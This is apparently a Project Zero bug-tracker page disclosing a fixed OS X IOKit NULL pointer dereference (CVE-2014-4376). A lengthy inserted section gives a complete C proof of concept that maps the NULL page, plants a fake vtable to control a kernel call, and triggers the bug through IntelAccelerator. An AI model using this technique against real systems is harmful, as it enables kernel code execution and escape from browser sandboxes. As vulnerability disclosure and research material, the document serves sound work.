Monorail Project: project-zero
Starred by 8 users
Status: Fixed
Closed: Sep 2014
OS X IOKit kernel code execution due to NULL pointer dereference in IOAccelContext2::clientMemoryForType
Project Member Reported by ianbeer@google.com, Jun 12 2014
Calling IOConnectMapMemory with type=0 of userclient 0x100 of IOService "IntelAccelerator" hits the following exploitable kernel NULL pointer dereference:

 mov rdi, [r12+1D8h]      ; rdi := NULL
 mov rax, [rdi]           ; read vtable pointer from NULL
 call qword ptr [rax+20h] ; controlled call

See attached PoC which maps the NULL page and kernel panics calling a virtual function near 0x4141414141414141.

This userclient is reachable from the Chrome GPU process sandbox and the Safari renderer sandbox.
 
Attachment: ig_video_main_map_memory_NULL.c (1.7 KB)
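The trigger the report describes, written out as an added example (this is not the attached ig_video_main_map_memory_NULL.c and not Apple's or Project Zero's code). It follows only what the report states: map the NULL page, place a fake vtable there whose slot at +0x20 holds 0x4141414141414141, and call IOConnectMapMemory with memoryType 0 on user client type 0x100 of the "IntelAccelerator" service. The one thing the report does not say, and which is my assumption, is how address 0 becomes mappable in a 64-bit process: the build line below links with -Wl,-pagezero_size,0 for that. The layout helper and the small emulator of the three disassembled instructions are portable and show why a single page at 0 can serve as both the fake object and its fake vtable; only trigger() needs OS X with an Intel GPU.

```c
/*
 * Added example: a reconstruction of the trigger the report describes, not
 * the attached ig_video_main_map_memory_NULL.c.  Steps from the report: map
 * the NULL page, put a fake vtable there whose slot at +0x20 holds
 * 0x4141414141414141, then call IOConnectMapMemory with memoryType 0 on
 * user client type 0x100 of the "IntelAccelerator" IOService.
 *
 * Assumption (not in the report): the binary is linked with
 * -Wl,-pagezero_size,0 so that mmap() can place a page at address 0.
 *   clang -o poc poc.c -framework IOKit -Wl,-pagezero_size,0
 * The layout helper and emulator are portable; only trigger() needs OS X.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_BYTES   0x1000u
#define VTABLE_SLOT  0x20u                  /* call qword ptr [rax+20h] */
#define MARKER       0x4141414141414141ULL  /* value from the report */

/*
 * Fill a page that will live at page_addr so that the three instructions
 *   rdi = [r12+1D8h] (== page_addr, i.e. 0 in the real bug)
 *   rax = [rdi]      (vtable pointer)
 *   call [rax+20h]
 * land on `target`.  The page's first qword points back at the page, so the
 * same page serves as both the fake object and its fake vtable.
 */
void build_fake_object(uint64_t *page, uint64_t page_addr, uint64_t target)
{
    memset(page, 0, PAGE_BYTES);
    page[0] = page_addr;                  /* object->vtable = page_addr */
    page[VTABLE_SLOT / sizeof(uint64_t)] = target;
}

/* Walk the dereference chain over the prepared page as the kernel would and
 * return the address that ends up in the indirect call. */
uint64_t emulate_controlled_call(const uint64_t *page, uint64_t page_addr, uint64_t rdi)
{
    uint64_t rax = page[(rdi - page_addr) / sizeof(uint64_t)];        /* mov rax, [rdi] */
    return page[(rax - page_addr + VTABLE_SLOT) / sizeof(uint64_t)];  /* [rax+20h] */
}

/* Portable self-check: treat the buffer as if it sat at address 0, exactly as
 * the mapped NULL page does, and confirm the chain resolves to MARKER. */
uint64_t self_test_layout(void)
{
    static uint64_t page[PAGE_BYTES / sizeof(uint64_t)];
    build_fake_object(page, 0, MARKER);
    return emulate_controlled_call(page, 0, 0);   /* rdi == NULL */
}

#ifdef __APPLE__
#include <sys/mman.h>
#include <mach/mach.h>
#include <IOKit/IOKitLib.h>

int trigger(void)
{
    /* Map the NULL page (requires the -pagezero_size,0 link assumption). */
    void *null_page = mmap(NULL, PAGE_BYTES, PROT_READ | PROT_WRITE,
                           MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
    if (null_page == MAP_FAILED) { perror("mmap NULL page"); return 1; }
    build_fake_object((uint64_t *)null_page, 0, MARKER);

    io_service_t service = IOServiceGetMatchingService(
        kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"));
    if (service == MACH_PORT_NULL) { fputs("IntelAccelerator not found\n", stderr); return 1; }

    io_connect_t conn = MACH_PORT_NULL;
    kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0x100, &conn);
    IOObjectRelease(service);
    if (kr != KERN_SUCCESS) { fprintf(stderr, "IOServiceOpen: 0x%x\n", kr); return 1; }

    vm_address_t addr = 0;
    vm_size_t size = 0;
    /* memoryType 0 reaches IOAccelContext2::clientMemoryForType; on a
     * vulnerable kernel the call through the fake vtable panics here. */
    kr = IOConnectMapMemory(conn, 0, mach_task_self(), &addr, &size, kIOMapAnywhere);
    fprintf(stderr, "IOConnectMapMemory returned 0x%x (no panic: likely patched)\n", kr);
    return 0;
}
#endif

int main(void)
{
#ifdef __APPLE__
    return trigger();
#else
    printf("fake vtable chain resolves to 0x%llx\n",
           (unsigned long long)self_test_layout());
    return 0;
#endif
}
```

The emulator is the part worth reading twice: because rdi is 0 and the first qword of the page is also 0, the page is dereferenced once as the object and once as the vtable, so only two writes (offset 0 and offset 0x20) are needed to steer the call. On a patched kernel the IOConnectMapMemory call simply returns an error code instead of panicking.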
Project Member Comment 1 by ianbeer@google.com, Jun 12 2014
Labels: Reported-2014-June-12 Id-607049399
Project Member Comment 2 by ianbeer@google.com, Aug 22 2014
Labels: Deadline-90
Project Member Comment 3 by ianbeer@google.com, Sep 10 2014
Labels: -Restrict-View-Commit Deadline-Exceeded PublicOn-2014-September-10
Deadline exceeded -- automatically derestricting
Comment 4 by cevans@google.com, Sep 23 2014
Labels: -Reported-2014-June-12 -PublicOn-2014-September-10 Reported-2014-Jun-12 PublicOn-2014-Sep-10 Fixed-2014-Sep-17 CVE-2014-4376
Status: Fixed
http://support.apple.com/kb/HT6443
Comment 5 by abmat...@gmail.com, Oct 2 2014
I am really interested in knowing the tools/techniques used in testing for these security bugs.